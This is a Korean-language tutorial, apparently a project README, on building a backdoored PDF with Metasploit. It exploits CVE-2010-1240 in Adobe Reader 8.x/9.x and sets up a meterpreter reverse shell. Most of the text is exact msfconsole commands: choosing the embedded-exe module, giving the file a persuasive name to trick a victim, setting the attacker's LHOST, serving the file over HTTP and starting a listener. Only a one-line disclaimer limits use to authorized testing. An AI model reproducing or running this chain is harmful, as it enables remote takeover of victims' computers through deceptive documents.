
Metasploit 기반 PDF 백도어 임베딩 도구: CVE-2010-1240을 악용하여 사회 공학을 통해 meterpreter 페이로드를 전달하며, 승인된 침투 테스트용입니다.
⚠️ 교육 및 승인된 보안 연구 목적으로만 사용하세요
Windows 및 Mac OS X에서 Adobe Reader 및 Acrobat 9.x(9.3.3 미만) 및 8.x(8.2.3 미만)는 파일 실행 경고 대화상자의 한 텍스트 필드 내용을 제한하지 않습니다. 이로 인해 원격 공격자가 PDF 문서에 지정된 임의의 로컬 프로그램을 실행하도록 사용자를 속이기 쉬워집니다. 이는 열기 버튼을 클릭하면 사용자가 암호화된 메시지를 읽을 수 있다고 주장하는 텍스트 필드를 통해 입증됩니다.

먼저 msfconsole을 실행하세요
msfconsole
그런 다음 PDF 삽입을 위한 페이로드를 설정하세요
use exploit/windows/fileformat/adobe_pdf_embedded_exe
INFILENAME 옵션을 설정하고 원본 PDF 파일의 직접 경로를 제공하세요
set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
FILENAME 옵션을 설정하여 새로 생성된 악성 PDF 파일의 이름을 더 설득력 있는 이름으로 설정하세요
set FILENAME laporan.pdf
페이로드를 찾아 PDF 파일에 삽입하세요
set payload windows/meterpreter/reverse_tcp
LHOST 옵션을 공격자의 IP로 설정하세요
set LHOST 172.16.10.10
새 터미널을 열고 악성 PDF 파일이 있는 위치로 이동하세요
cd .msf4/local/
python으로 임시 서버를 생성하세요
python -m http.server
피해자 시스템에서 악성 PDF 파일을 다운로드하세요
http://172.16.10.10:8000/certificate.pdf
피해자 시스템에서 악성 PDF 파일을 실행하기 전에 이전 터미널에서 리스너를 시작하세요
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.10.10
exploit
피해자 시스템에서 악성 PDF 파일이 실행되면 피해자 시스템에 대한 연결이 제공됩니다